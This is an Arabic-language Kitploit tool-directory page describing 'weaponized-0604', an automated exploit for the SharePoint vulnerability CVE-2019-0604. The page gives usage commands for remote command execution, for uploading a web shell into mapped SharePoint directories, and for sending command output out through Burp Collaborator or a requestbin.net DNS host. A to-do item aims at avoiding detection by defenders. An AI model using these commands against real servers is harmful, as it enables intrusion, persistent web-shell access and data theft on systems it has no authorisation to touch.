Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
weaponized-0604 — أداة آلية لاستغلال SharePoint CVE-2019-0604 | Kitploit
أدوات/GitHubGitHub/gh0st0ne/weaponized-0604
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubgh0st0ne/weaponized-0604

weaponized-0604

أداة آلية لاستغلال SharePoint CVE-2019-0604

عرض المستودع
81منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال مُسلّحة لـ CVE-2019-0604

أداة استغلال آلية لتعظيم استغلال CVE-2019-0604.

المتطلبات

ملف requirements.txt يجب أن يسرد جميع مكتبات بايثون التي تستخدمها هذه الأداة، وسيتم تثبيتها باستخدام

root@kitploit:~
$ pip install -r requirements.txt

الاستغلال الأعمى اليدوي (مع أو بدون بيانات اعتماد)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>

وظيفة التحميل

تحميل أي شيء رائع (شل ويب، أداة استطلاع ...)

root@kitploit:~
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx

تعيين الدليل

root@kitploit:~
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/

استخدام OOB للحصول على نتيجة الأمر

مع إضافة Burp collaborator_http_api

  1. تثبيت collaborator_http_api.py في BurpSuite (Pro)؟

  2. تأكد من أن BurpSuite يعمل على نفس الجهاز مع هذه الأداة الاستغلالية.

  3. قم بالتشغيل، واستمتع بالمخرجات المسترجعة :)

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

sharepoint-rce-oob-demo

مع DNSLog مثل requestbin.net

root@kitploit:~
$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"

الحصول على البيانات من DNS

root@kitploit:~
2050524956494c4547455320494e464f524d4154494f4e
...

قم بفك التشفير بنفسك :)

root@kitploit:~
 PRIVILEGES INFORMATION
...

قائمة المهام

  • محلل الوسائط
  • SharePoint, CVE-2019-0604
  • تقسيم الأمر إلى أجزاء متعددة (في args.cmds)
  • تحديد الثنائي حسب الطلب، لتجنب الكشف من قبل الفريق الأزرق. (حاليًا cmd.exe مقيد بشكل ثابت)

المؤلف

  • Tree
تنزيل الأداة